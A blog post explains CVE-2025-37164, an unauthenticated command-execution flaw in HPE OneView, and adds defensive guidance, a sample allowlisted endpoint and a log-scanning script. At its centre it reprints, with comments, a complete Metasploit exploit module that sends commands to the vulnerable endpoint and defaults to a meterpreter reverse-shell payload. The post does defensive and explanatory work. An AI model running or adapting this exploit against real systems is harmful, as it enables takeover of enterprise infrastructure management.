CVE-2025-37164: A Critical Vulnerability That Should Never Exist

Siddhant Bali, an aspiring tech entrepreneur, is an Undergraduate Research Scholar at IIIT Delhi, currently pursuing a B.Tech in Computer Science Engineering with a focus on design (CSD). Excelling in college activities and event management, Siddhant's entrepreneurial spirit propels him into innovative ventures. Connect on LinkedIn or reach out at siddhant22496@iiitd.ac.in for more info.
When “Remote Code Execution” Is a Feature, Not a Bug
This blog explains CVE-2025-37164, a critical security vulnerability found in HPE OneView, in a way that is easy to understand, even if you are new to security.
No buzzwords.
No marketing language.
Just what happened, why it’s bad, and why it matters.
https://nvd.nist.gov/vuln/detail/CVE-2025-37164
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/hpe_oneview_rce.rb
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US#vulnerability-summary-1
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-37164

What Is HPE OneView?
HPE OneView is enterprise software used by large organizations to manage their physical infrastructure:
Servers
Firmware
Hardware lifecycle
Data center automation
Think of it as a central command dashboard for a company’s infrastructure.

Because of this role:
It has high privileges
It is deeply trusted
It usually sits inside internal networks
It is rarely monitored like public-facing apps
This makes any security flaw in it extremely dangerous.
What Is CVE-2025-37164?
CVE-2025-37164 is a Remote Code Execution (RCE) vulnerability rated 10.0 / Critical.
In simple terms:
Anyone who can reach the OneView interface can make it run commands of their choosing.
No login required
No credentials required
No complex exploitation
No bypass tricks
Public exploits already exist, including a Metasploit module, which means attackers can weaponize this in minutes.

Why This Vulnerability Is So Bad
Most critical vulnerabilities happen because of:
Programming mistakes
Memory bugs
Logic errors
Edge cases
This one does not.
The vulnerability exists because the software exposes an endpoint designed to run system commands.
That is the shocking part.
How the Vulnerability Works (Plain English)
There is a REST API endpoint inside OneView:
/rest/id-pools/execute-command
What does it do?
Accepts an HTTP request
Reads a parameter called command
Executes that command on the system
That’s it.
No authentication.
No permission checks.
No meaningful restrictions.
If you send:
command = "whoami"
The system runs it.
This is not clever hacking.
This is remote command execution by design.
##
# This module requires Metasploit to run.
# Metasploit framework provides exploit primitives, payload handling, etc.
# https://metasploit.com/download
#
# Source code for Metasploit framework:
# https://github.com/rapid7/metasploit-framework
##

# Define a Metasploit exploit module class
class MetasploitModule < Msf::Exploit::Remote
  # Exploit reliability ranking (used by Metasploit UI)
  Rank = ExcellentRanking

  # Include HTTP client helpers (send_request_cgi, normalize_uri, SSL, etc.)
  include Msf::Exploit::Remote::HttpClient
  # Automatically run `check` before exploitation
  prepend Msf::Exploit::Remote::AutoCheck

  # Module initialization
  def initialize(info = {})
    super(
      update_info(
        info,
        # Human-readable name shown in Metasploit
        'Name' => 'HPE OneView unauthenticated RCE',
        # Detailed description of the vulnerability
        'Description' => %q{
          This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164,
          against Hewlett Packard Enterprise (HPE) OneView.
          All versions below 11.00 are vulnerable unless the vendor hotfix is applied.
          Some VM-based versions disable the vulnerable "ID Pools" endpoint and are
          therefore not exploitable.
        },
        # Metasploit license identifier
        'License' => MSF_LICENSE,
        # Credits
        'Author' => [
          # Vulnerability discovery
          'Nguyen Quoc Khanh',
          # Exploit development and analysis
          'remmons-r7',
          'sfewer-r7'
        ],
        # External references
        'References' => [
          ['CVE', '2025-37164'],
          ['URL', 'https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US'],
          ['URL', 'https://www.rapid7.com/blog/post/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview/'],
          ['URL', 'https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis']
        ],
        # Public disclosure date
        'DisclosureDate' => '2025-12-16',
        # Exploit does not require root privileges
        # Command executes as the `trm3` service account
        'Privileged' => false,
        # Target operating systems
        'Platform' => ['unix', 'linux'],
        # Payload architecture: command execution
        'Arch' => [ARCH_CMD],
        # Supported exploit targets
        'Targets' => [
          [
            'Default', {
              # Payload constraints
              'Payload' => {
                # Characters that cannot appear in JSON or command string
                'BadChars' => '"\' ',
                # Encoder used to bypass space restriction using IFS trick
                'Encoder' => 'cmd/ifs'
              },
              # Default payload used if user does not override
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
              }
            }
          ],
        ],
        # Default target index
        'DefaultTarget' => 0,
        # Default exploit options
        'DefaultOptions' => {
          'RPORT' => 443, # HTTPS port
          'SSL' => true # Use SSL/TLS
        },
        # Operational notes for users
        'Notes' => {
          'Stability' => [CRASH_SAFE], # Does not crash service
          'Reliability' => [REPEATABLE_SESSION], # Works consistently
          'SideEffects' => [IOC_IN_LOGS] # Leaves log artifacts
        }
      )
    )

    # Register user-configurable option
    # TARGETURI is the base path of the application
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Check if the target is vulnerable
  def check
    # Query OneView REST API version endpoint
    res_ver = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'rest', 'appliance', 'version')
    )
    # If connection failed
    return CheckCode::Unknown('Connection to /rest/appliance/version failed') unless res_ver
    # If unexpected HTTP status
    return CheckCode::Unknown("Unexpected /rest/appliance/version response code #{res_ver.code}") unless res_ver.code == 200

    # Parse JSON version response
    json_ver = JSON.parse(res_ver.body)
    # Build a human-readable version string
    version_string = 'Detected '
    version_string += json_ver['modelNumber'] || 'HPE OneView'
    version_string += ' version '
    version_string += json_ver['softwareVersion'] || 'unknown'

    # Generate a benign command with a random UUID
    # This is used to test command execution without harm
    cmd = "echo #{SecureRandom.uuid}"
    # Execute command using vulnerable endpoint
    res = execute_cmd(cmd, shell: false)
    # If exploit request failed
    return CheckCode::Unknown("#{version_string}. Connection failed") unless res
    # If endpoint is blocked or removed
    # Vendor hotfix rewrites this endpoint to 404
    return CheckCode::Safe("#{version_string}. Target endpoint returned response code #{res.code}") if res.code == 404
    # Any unexpected status code
    return CheckCode::Unknown("#{version_string}. Unexpected response code #{res.code}") unless res.code == 200

    # Parse exploit response
    j = JSON.parse(res.body)
    # If the response confirms execution of our test command
    if (j['type'] == 'ExecutableCommand') &&
       (j['cmd'] == cmd) &&
       (j['result'] == true)
      return Exploit::CheckCode::Vulnerable(version_string)
    end

    # Anything else is inconclusive
    CheckCode::Unknown("#{version_string}. Unexpected JSON results")
  rescue JSON::ParserError
    # Handle malformed JSON
    return CheckCode::Unknown('Failed to parse JSON body')
  end

  # Main exploitation routine
  def exploit
    # Execute the encoded payload via shell
    res = execute_cmd(payload.encoded, shell: true)
    # Network failure
    fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Connection failed') unless res
    # Unexpected HTTP response
    fail_with(Msf::Exploit::Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200

    # Parse response
    j = JSON.parse(res.body)
    # Ensure correct response type
    fail_with(Msf::Exploit::Failure::UnexpectedReply,
              'Response is not of type ExecutableCommand') if j['type'] != 'ExecutableCommand'

    # If Java Runtime.exec failed internally
    # We warn instead of failing because payload may still have executed
    if j['result'] == false
      print_warning(
        'Command execution returned a result of false, likely due to an unexpected IOException server-side'
      )
    end
  rescue JSON::ParserError
    fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Failed to parse JSON body')
  end

  # Helper method to execute a command via the vulnerable endpoint
  def execute_cmd(cmd, shell:)
    send_request_cgi(
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, 'rest', 'id-pools', 'executeCommand'),
      'ctype' => 'application/json',
      # JSON payload sent to OneView
      'data' => {
        # If shell=true, run via `/bin/sh -c`
        # Spaces and quotes are avoided using IFS encoder
        'cmd' => shell ? "sh -c #{cmd}" : cmd,
        # Server will set this to true if execution succeeds
        'result' => false
      }.to_json
    )
  end
end
What Level of Access Does an Attacker Get?
The command does not run as root, which is the only small mercy here.
However, the attacker still gets:
A valid local system user
Ability to download tools
Ability to open reverse shells
Ability to pivot deeper into the network
In security terms, this is initial access, which is the hardest step for attackers. Once they have it, everything else becomes easier.
Why This Is Especially Dangerous in Enterprise Environments
HPE OneView is not just another application.
It sits at what’s called the control plane.
That means it can:
Touch many servers at once
Control firmware and hardware behavior
Orchestrate infrastructure changes
Operate with elevated trust
So exploitation is not just:
“Someone ran a command”
It is:
“Someone gained centralized influence over enterprise infrastructure”
This dramatically increases the blast radius.
“But It’s Internal, Right?” — Why That Doesn’t Save You
Many organizations assume internal systems are safe.
They are not.
All it takes is:
One firewall misconfiguration
One exposed interface
One compromised employee laptop
One insider with bad intent
Once someone is on the internal network, this vulnerability becomes a free entry point.
Zero-trust principles exist specifically because this assumption fails so often.
Insider Threat: The Overlooked Risk
This vulnerability is especially dangerous for insider threats.
A disgruntled employee or contractor:
Does not need admin credentials
Does not need malware
Does not need privilege escalation
They can simply send a request and execute commands.
This turns internal access into infrastructure-level power.
The Vendor Fix — And Why It’s Concerning
The provided fix did not remove the dangerous functionality.
Instead, it:
Added HTTP rules
Blocked access to the endpoint
In other words:
“You’re not allowed to go here anymore.”
This approach is fragile because:
Filters can be bypassed
Proxies can forward requests
Internal request routing can re-expose endpoints
History shows these protections fail over time
Security should never rely on “just block the URL.”
What a Proper Fix Would Look Like
A secure design would include:
Removing command execution endpoints entirely
Requiring strong authentication
Restricting execution to tightly scoped actions
Logging and auditing all privileged operations
Separating orchestration logic from system execution
If a feature allows arbitrary command execution, it does not belong in a web-accessible API.
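To make the design points above concrete, here is an added example (not HPE's code and not part of the original post) of what a request handler in this spot should look like instead: the caller must authenticate, may only name an allowlisted action that maps to a fixed argv, every decision is audited, and execution is delegated to a separate component. The token value, the `idpoolctl` helper and the `X-Caller` header are assumptions made up for the example.

```python
import hmac
import json
from typing import Callable, Dict, List

# Hypothetical bearer token for the example; a real service would take identity from its auth layer.
API_TOKEN = "constructed-example-token"

# Allowlist of named actions mapped to fixed argv: the caller picks a name, never a command
# string, so nothing it sends reaches a shell. "idpoolctl" is a hypothetical helper binary.
ACTIONS: Dict[str, List[str]] = {
    "pool-status": ["idpoolctl", "status"],
    "pool-refresh": ["idpoolctl", "refresh"],
}
AUDIT_LOG: List[dict] = []  # every privileged decision is recorded here


# Stand-in for a separate execution service; returns an exit code.
def simulated_executor(argv: List[str]) -> int:
    return 0


def handle_execute(headers: dict, body: str,
                   executor: Callable[[List[str]], int] = simulated_executor) -> dict:
    """Authenticated, allowlisted replacement for a raw 'run this cmd' endpoint."""
    caller = headers.get("X-Caller", "unknown")
    token = headers.get("Authorization", "")
    if not hmac.compare_digest(token.encode(), f"Bearer {API_TOKEN}".encode()):
        AUDIT_LOG.append({"caller": caller, "decision": "deny", "reason": "unauthenticated"})
        return {"status": 401, "error": "authentication required"}
    try:
        req = json.loads(body)
    except ValueError:
        req = None
    if not isinstance(req, dict):
        return {"status": 400, "error": "body must be a JSON object"}
    if "cmd" in req:  # the request shape the vulnerable endpoint accepted
        AUDIT_LOG.append({"caller": caller, "decision": "deny", "reason": "free-form cmd"})
        return {"status": 400, "error": "free-form commands are not accepted"}
    action = req.get("action")
    if not isinstance(action, str) or action not in ACTIONS:
        AUDIT_LOG.append({"caller": caller, "decision": "deny", "reason": f"unknown action {action!r}"})
        return {"status": 403, "error": "action not permitted"}
    rc = executor(ACTIONS[action])  # execution happens in a separate component, with fixed argv
    AUDIT_LOG.append({"caller": caller, "decision": "allow", "action": action, "rc": rc})
    return {"status": 200, "action": action, "rc": rc}


if __name__ == "__main__":
    auth = {"Authorization": f"Bearer {API_TOKEN}", "X-Caller": "ops-admin"}
    print(handle_execute(auth, '{"cmd": "whoami", "result": false}'), handle_execute(auth, '{"action": "pool-status"}'))
```

The second call in the demo sends exactly the JSON shape the vulnerable endpoint accepted and is refused before anything is executed.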
What Organizations Should Do Right Now
If you use HPE OneView:
Patch immediately
Treat this as a potential breach
Review logs for suspicious commands
Monitor outbound network connections
Restrict access to management interfaces
Segment infrastructure control networks
Assume attackers may already have tested this
Do not treat this as a routine update.
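For the "review logs" step, here is an added example (not from the post, HPE or the Metasploit project) that scans web-access log lines for requests to the command endpoint. It uses the facts stated above: the module first fetches /rest/appliance/version, then sends a PUT to the id-pools command endpoint, and a hotfixed appliance answers that PUT with 404 while a vulnerable one answers 200. The log lines and the combined-log layout are constructed for the example; OneView's real log format may differ.

```python
import re
from collections import Counter

# Constructed sample lines in combined-log format (illustrative, not real OneView logs).
SAMPLE_LOG = """\
10.0.5.21 - - [17/Dec/2025:09:14:02 +0000] "GET /rest/appliance/version HTTP/1.1" 200 312 "-" "python-requests/2.32"
10.0.5.21 - - [17/Dec/2025:09:14:03 +0000] "PUT /rest/id-pools/executeCommand HTTP/1.1" 200 98 "-" "python-requests/2.32"
10.0.7.9 - - [17/Dec/2025:10:02:45 +0000] "PUT /rest/id-pools/execute-command HTTP/1.1" 404 0 "-" "curl/8.5.0"
10.0.1.4 - - [17/Dec/2025:10:10:00 +0000] "GET /rest/servers HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Both spellings of the endpoint used in this post are matched.
ENDPOINT_RE = re.compile(r'^/rest/id-pools/(executeCommand|execute-command)(\?|$)', re.IGNORECASE)
VERSION_PATH = '/rest/appliance/version'


def scan(log_text):
    """Return one finding per request to the command endpoint, in log order."""
    probed = set()  # IPs that fetched the version endpoint, as the module's check() does first
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if m['path'] == VERSION_PATH:
            probed.add(m['ip'])
            continue
        if not ENDPOINT_RE.match(m['path']):
            continue
        status = int(m['status'])
        # Hotfixed appliances answer 404 here; a 200 means the command handler ran.
        verdict = {200: 'LIKELY_EXECUTED', 404: 'BLOCKED'}.get(status, 'REVIEW')
        findings.append({
            'ip': m['ip'], 'ts': m['ts'], 'method': m['method'], 'ua': m['ua'],
            'status': status, 'verdict': verdict,
            'version_probe_seen': m['ip'] in probed,
        })
    return findings


def summarize(findings):  # verdict counts plus distinct sources, for quick triage
    return {'verdicts': dict(Counter(f['verdict'] for f in findings)),
            'sources': sorted({f['ip'] for f in findings})}


if __name__ == '__main__':
    print(summarize(scan(SAMPLE_LOG)))
```

A LIKELY_EXECUTED finding means the command handler answered, so the source and the time window belong in the incident scope regardless of whether the command itself was logged.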
Final Thoughts
This vulnerability is not impressive.
It is not clever.
It is not subtle.
It violates basic security principles by exposing raw command execution in a highly trusted system.
When enterprise control software ships with something this dangerous:
Attackers don’t need skill
Defenders lose reaction time
Damage scales quickly
This is why management platforms must be held to the highest security standards, not the lowest.
TL;DR
Critical RCE in enterprise infrastructure software
No authentication required
Extremely easy to exploit
High impact due to trusted position
Patch immediately
Assume breach, not safety